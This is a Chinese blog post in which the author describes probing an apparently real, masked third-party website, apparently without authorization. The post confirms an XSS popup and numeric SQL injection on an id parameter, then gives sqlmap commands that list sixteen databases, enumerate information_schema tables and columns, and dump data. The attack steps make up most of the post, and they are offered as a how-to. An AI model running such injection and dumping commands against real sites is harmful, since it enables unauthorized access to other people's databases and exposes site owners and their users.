记录一次简单的web实战

盛年不重来,一日难再晨
在茫茫大海中,终于等到了你的到来!
在不断的搜索中,终于找到了一个“可爱啊”的网站,现在准备开饭了!

image.png

在这就绕过信息收集这个步骤了,在初步拿到这个网站时,首先要注意网站的结构,server之类的。
BEGIN

在网站代码后面输入JaveaScript测试代码 ;出现弹窗,证明存在一个小的XSS,是否存在更多的XSS漏洞信息,以后再做补充。

image.png

除此之后,我们对其他漏洞页进去了测试,结果居然有了!!!

image.png

可以发现,存在数字型的sql注入点;于是用了传统的方法对网站进行了sql测试

http://www.xxxxxx.net/main.PHP?id=35 and 1=1 ;http://www.xxxxx.net/main.PHP?id=35 or 1=1

image.png

虽然输入这个判断其可能存在注入点,但是还是需要进一步测试

现在我们用kali中的sqlmap进行扫描;

sqlmap -u http://www.xxxxxx.net/main.PHP?id=35

image.png

从扫描的结果可以知道,数据库MysqL,Apach版本为2.0.47,PHP版本为5.1.4,属于高版本,由前面的知识点可以判定肯定存在'information_schema'这个数据库

接下来,我们将查询该网站可能存在的其他数据库

sqlmap -u http://www.xxxxx.net/main.PHP?id=35 --dbs

image.png

我们可以看到,这个网站存在16个数据库,其中应该有我们想要看的东西(切记 只能看,不能改哟)

于是我进入到了刚才提到的‘information_schema'这个数据库

第一:查看该数据库的所有表名 sqlmap -u http://www.xxxxx/main.PHP?id=35 -D information_schema --tables

image.png

第二:选择其中一个表,查看其字段 qlmap -u http://www.xxxxxx.net/main.PHP?id=35 -D information_schema -T TABLES --columns

image.png

第三:查看字段中的数据值 sqlmap -u http://www.xxxx.net/main.PHP?id=35 -Dinformation_schema -C TABLE_NAME -dump

image.png

image.png

既然这个网站存在一些漏洞,我们也得遵守法律,也就到这儿吧!

相关文章

统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...
前言 之前做了微信登录,所以总结一下微信授权登录并获取用户...
FastAdmin是我第一个接触的后台管理系统框架。FastAdmin是一...
之前公司需要一个内部的通讯软件,就叫我做一个。通讯软件嘛...
统一支付是JSAPI/NATIVE/APP各种支付场景下生成支付订单,返...